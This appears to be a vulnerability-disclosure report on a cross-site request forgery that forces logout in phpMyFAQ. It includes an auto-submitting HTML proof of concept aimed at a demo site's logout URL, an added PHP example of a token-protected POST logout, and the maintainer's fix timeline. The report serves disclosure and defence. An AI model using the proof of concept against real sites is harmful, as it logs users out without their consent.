Cross-Site Request Forgery (CSRF) in thorsten/phpmyfaq

Valid

Reported on Jul 26th 2022

Description

An attacker can log out a logged-in user by getting that user to visit a web page the attacker controls.

Proof of Concept

PoC.html

<html>
    <body>
        <!-- Hide the PoC page's own URL in the address bar -->
        <script>history.pushState('', '', '/')</script>
        <!-- A GET form aimed at the logout URL; the endpoint requires no token -->
        <form action="http://roy.demo.phpmyfaq.de/?action=logout">
            <input type="submit" value="Submit request" />
        </form>
        <!-- Submit automatically as soon as the page loads -->
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Impact

This vulnerability lets an attacker force users to log out without intending to.

More details

One way the GET-based logout can be abused: a third party (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, they are unknowingly logged out. This is why logout should be a POST request protected by a CSRF token.
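As an added example (my own code, not phpMyFAQ's and not the linked fix), here is the pattern the paragraph calls for in PHP: a logout endpoint that changes state only on a POST carrying the session's CSRF token, so neither an <img src> GET nor an auto-submitted cross-site form can log the user out. The path /logout.php and the field name csrf_token are assumptions.

```php
<?php
// Added example, not phpMyFAQ's own code: a logout endpoint that changes
// state only on POST and only when the session's CSRF token is present.
declare(strict_types=1);
session_start();

// Issue one random token per session; the logout form embeds it as a hidden field.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only for a POST whose submitted token matches the session token.
// hash_equals() runs in constant time, so a mismatch leaks nothing about the value.
function isValidLogoutRequest(string $method, ?string $submitted, ?string $expected): bool
{
    if ($method !== 'POST' || $submitted === null || $expected === null) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $ok = isValidLogoutRequest(
        $_SERVER['REQUEST_METHOD'],
        $_POST['csrf_token'] ?? null,   // assumed field name
        $_SESSION['csrf_token'] ?? null
    );
    if (!$ok) {
        // A cross-origin form or a bare <img src=...> GET lacks the token and is rejected here.
        http_response_code(403);
        exit('Invalid logout request.');
    }
    $_SESSION = [];
    session_destroy();
    header('Location: /');
    exit;
}

// GET only renders the confirmation form; nothing is logged out on GET.
$token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
echo <<<HTML
<form method="post" action="/logout.php">
  <input type="hidden" name="csrf_token" value="{$token}">
  <button type="submit">Log out</button>
</form>
HTML;
```

Marking the session cookie SameSite=Lax adds a second layer, but the server-side method and token checks are what make the endpoint safe on their own.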

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF issue.

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 4 months ago
We have contacted a member of the thorsten/phpmyfaq team and are waiting to hear back 4 months ago
Thorsten Rinne modified the Severity from High to Low 4 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Thorsten Rinne validated this vulnerability 4 months ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne gave praise 4 months ago
Thanks for the hint, I fixed that in the backend some months ago, but missed the one in the frontend. Here's the fix: https://github.com/thorsten/phpMyFAQ/commit/3af0bbb0856fe821ba20df22884fc7a7b95c3bcb
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
We have sent a fix follow up to the thorsten/phpmyfaq team. We will try again in 7 days. 4 months ago
We have sent a second fix follow up to the thorsten/phpmyfaq team. We will try again in 10 days. 4 months ago
We have sent a third and final fix follow up to the thorsten/phpmyfaq team. This report is now considered stale. 4 months ago
Thorsten Rinne marked this as fixed in 3.1.7 with commit 3af0bb 2 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability will not receive a CVE